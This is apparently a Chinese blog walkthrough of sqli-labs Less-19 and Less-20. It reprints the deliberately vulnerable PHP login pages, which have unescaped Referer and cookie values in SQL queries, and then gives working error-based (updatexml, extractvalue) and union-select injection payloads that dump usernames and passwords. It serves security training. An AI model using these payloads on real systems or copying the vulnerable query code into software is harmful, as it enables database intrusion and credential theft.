- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Less-19 Header Injection- Referer- Error Based- string</title>
- </head>
- <body bgcolor="#000000">
- <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"> Welcome <font color="#FF0000"> Dhakkan </font><br></div>
- <div align="center" style="margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;">
- <div style="padding-top:10px; font-size:15px;">
- <!--Form to post the contents -->
- <form action="" name="form1" method="post">
- <div style="margin-top:15px; height:30px;">Username :
- <input type="text" name="uname" value=""/> </div>
- <div> Password :
- <input type="text" name="passwd" value=""/></div></br>
- <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>
- </form>
- </div>
- </div>
- <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">
- <font size="3" color="#FFFF00">
- <?php
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- error_reporting(0);
- function check_input($value)
- {
- if(!empty($value))
- {
- // truncation (see comments)
- $value = substr($value,0,20);
- }
- // Stripslashes if magic quotes enabled
- if (get_magic_quotes_gpc())
- {
- $value = stripslashes($value);
- }
- // Quote if not a number
- if (!ctype_digit($value))
- {
- $value = "'" . mysql_real_escape_string($value) . "'";
- }
- else
- {
- $value = intval($value);
- }
- return $value;
- }
- $uagent = $_SERVER['HTTP_REFERER'];
- $IP = $_SERVER['REMOTE_ADDR'];
- echo "<br>";
- echo 'Your IP ADDRESS is: ' .$IP;
- echo "<br>";
- //echo 'Your User Agent is: ' .$uagent;
- // take the variables
- if(isset($_POST['uname']) && isset($_POST['passwd']))
- {
- $uname = check_input($_POST['uname']);
- $passwd = check_input($_POST['passwd']);
- /*
- echo 'Your Your User name:'. $uname;
- echo "<br>";
- echo 'Your Password:'. $passwd;
- echo "<br>";
- echo 'Your User Agent String:'. $uagent;
- echo "<br>";
- echo 'Your User Agent String:'. $IP;
- */
- //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'Referer:'.$uname."\n");
- fclose($fp);
- $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
- $result1 = mysql_query($sql);
- $row1 = mysql_fetch_array($result1);
- if($row1)
- {
- echo '<font color= "#FFFF00" font size = 3 >';
- $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
- mysql_query($insert);
- //echo 'Your IP ADDRESS is: ' .$IP;
- echo "</font>";
- //echo "<br>";
- echo '<font color= "#0000ff" font size = 3 >';
- echo 'Your Referer is: ' .$uagent;
- echo "</font>";
- echo "<br>";
- print_r(mysql_error());
- echo "<br><br>";
- echo '<img src="../images/flag.jpg" />';
- echo "<br>";
- }
- else
- {
- echo '<font color= "#0000ff" font size="3">';
- //echo "Try again looser";
- print_r(mysql_error());
- echo "</br>";
- echo "</br>";
- echo '<img src="../images/slap.jpg" />';
- echo "</font>";
- }
- }
- ?>
- </font>
- </div>
- </body>
- </html>
从源代码中我们可以看到我们获取到的是HTTP_REFERER,那和less18是基本一致的,我们从referer进行修改
要获取用户名和密码的话,和之前是一样的
- ' or updatexml(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1)),1) or'
不过这次我们使用另一个函数,
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串).
作用:从目标XML中返回包含所查询值的字符串
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串).
作用:从目标XML中返回包含所查询值的字符串
- ' or extractvalue(1,concat(0x2b5e,(select concat_ws(char(32,44,32),id,username,password) from users limit 0,1))) or'
返回的结果是一样的,这里就不贴图了。
Less-20基于错误的cookie头部POST注入
①
先打开网页查看 Welcome Dhakkan
②查看源码:
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Less-20 Cookie Injection- Error Based- string</title>
- </head>
- <body bgcolor="#000000">
- <?php
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- error_reporting(0);
- if(!isset($_COOKIE['uname']))
- {
- //including the Mysql connect parameters.
- include("../sql-connections/sql-connect.php");
- echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome <font color='#FF0000'> Dhakkan </font><br></div>";
- echo "<div align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
- echo "<div style='padding-top:10px; font-size:15px;'>";
- echo "<!--Form to post the contents -->";
- echo '<form action=" " name="form1" method="post">';
- echo ' <div style="margin-top:15px; height:30px;">Username : ';
- echo ' <input type="text" name="uname" value=""/> </div>';
- echo ' <div> Password : ';
- echo ' <input type="text" name="passwd" value=""/></div></br>';
- echo ' <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';
- echo '</form>';
- echo '</div>';
- echo '</div>';
- echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
- echo '<font size="3" color="#FFFF00">';
- echo '<center><br><br><br>';
- echo '<img src="../images/Less-20.jpg" />';
- echo '</center>';
- function check_input($value)
- {
- if(!empty($value))
- {
- $value = substr($value,0,20); // truncation (see comments)
- }
- if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
- {
- $value = stripslashes($value);
- }
- if (!ctype_digit($value)) // Quote if not a number
- {
- $value = "'" . mysql_real_escape_string($value) . "'";
- }
- else
- {
- $value = intval($value);
- }
- return $value;
- }
- echo "<br>";
- echo "<br>";
- if(isset($_POST['uname']) && isset($_POST['passwd']))
- {
- $uname = check_input($_POST['uname']);
- $passwd = check_input($_POST['passwd']);
- $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
- $result1 = mysql_query($sql);
- $row1 = mysql_fetch_array($result1);
- $cookee = $row1['username'];
- if($row1)
- {
- echo '<font color= "#FFFF00" font size = 3 >';
- setcookie('uname', $cookee, time()+3600);
- header ('Location: index.php');
- echo "I LOVE YOU COOKIES";
- echo "</font>";
- echo '<font color= "#0000ff" font size = 3 >';
- //echo 'Your Cookie is: ' .$cookee;
- echo "</font>";
- echo "<br>";
- print_r(mysql_error());
- echo "<br><br>";
- echo '<img src="../images/flag.jpg" />';
- echo "<br>";
- }
- else
- {
- echo '<font color= "#0000ff" font size="3">';
- //echo "Try again looser";
- print_r(mysql_error());
- echo "</br>";
- echo "</br>";
- echo '<img src="../images/slap.jpg" />';
- echo "</font>";
- }
- }
- echo "</font>";
- echo '</font>';
- echo '</div>';
- }
- else
- {
- if(!isset($_POST['submit']))
- {
- $cookee = $_COOKIE['uname'];
- $format = 'D d M Y - H:i:s';
- $timestamp = time() + 3600;
- echo "<center>";
- echo '<br><br><br>';
- echo '<img src="../images/Less-20.jpg" />';
- echo "<br><br><b>";
- echo '<br><font color= "red" font size="4">';
- echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
- echo "</font><br>";
- echo '<font color= "cyan" font size="4">';
- echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];
- echo "</font><br>";
- echo '<font color= "#FFFF00" font size = 4 >';
- echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
- echo '<font color= "orange" font size = 5 >';
- echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
- echo "<br></font>";
- $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
- $result=mysql_query($sql);
- if (!$result)
- {
- die('Issue with your mysql: ' . mysql_error());
- }
- $row = mysql_fetch_array($result);
- if($row)
- {
- echo '<font color= "pink" font size="5">';
- echo 'Your Login name:'. $row['username'];
- echo "<br>";
- echo '<font color= "grey" font size="5">';
- echo 'Your Password:' .$row['password'];
- echo "</font></b>";
- echo "<br>";
- echo 'Your ID:' .$row['id'];
- }
- else
- {
- echo "<center>";
- echo '<br><br><br>';
- echo '<img src="../images/slap1.jpg" />';
- echo "<br><br><b>";
- //echo '<img src="../images/Less-20.jpg" />';
- }
- echo '<center>';
- echo '<form action="" method="post">';
- echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
- echo '</form>';
- echo '</center>';
- }
- else
- {
- echo '<center>';
- echo "<br>";
- echo "<br>";
- echo "<br>";
- echo "<br>";
- echo "<br>";
- echo "<br>";
- echo '<font color= "#FFFF00" font size = 6 >';
- echo " Your Cookie is deleted";
- setcookie('uname', $row1['username'], time()-3600);
- header ('Location: index.php');
- echo '</font></center></br>';
- }
- echo "<br>";
- echo "<br>";
- //header ('Location: main.php');
- echo "<br>";
- echo "<br>";
- //echo '<img src="../images/slap.jpg" /></center>';
- //logging the connection parameters to a file for analysis.
- $fp=fopen('result.txt','a');
- fwrite($fp,'Cookie:'.$cookee."\n");
- fclose($fp);
- }
- ?>
- </body>
- </html>
分析代码,首先判断有无cookie,没有的话,查询出来再设置cookie,若cookie存在,又分两种情况:
第一种情况,你登陆过,cookie还有效,你没按删除cookie的按钮,那么他就输出各种信息,包括删除cookie的按钮
第二种情况,你按了删除cookie的按钮,后台就把cookie的时间设置为过期的时间,那么cookie就被删除了
关键代码:
- $sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
那么久不废话了,一次性搞定吧
- -admin' union select 1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+
609
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
